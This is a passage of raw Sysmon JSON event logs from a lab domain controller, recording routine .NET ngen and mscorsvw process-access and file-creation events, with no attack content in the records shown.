06:00:07.793","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-0010BAE61000}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.793\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-0010BAE61000}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.793","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-0010BAE61000}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-0010CBB51100}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-0010CBB51100}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.934\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-00101FBB1100}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.934","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-00101FBB1100}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.934\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-00101FBB1100}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.934","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-00101FBB1100}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:07.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E7-5F25-0000-00101FBB1100}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:07.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E7-5F25-0000-00101FBB1100}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:09.325\r\nProcessGuid: {A837DB8D-04E7-5F25-0000-00101FBB1100}\r\nProcessId: 2744\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ab8-0\\System.Web.Extensions.dll\r\nCreationUtcTime: 2020-08-01 06:00:09.325","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:09.325","ProcessGuid":"{A837DB8D-04E7-5F25-0000-00101FBB1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ab8-0\\System.Web.Extensions.dll","CreationUtcTime":"2020-08-01 06:00:09.325","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:09.403\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E9-5F25-0000-001074C21100}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:09.403","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E9-5F25-0000-001074C21100}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:09.403\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E9-5F25-0000-001074C21100}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:09.403","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E9-5F25-0000-001074C21100}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:09.418\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E9-5F25-0000-001074C21100}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:09.418","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E9-5F25-0000-001074C21100}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.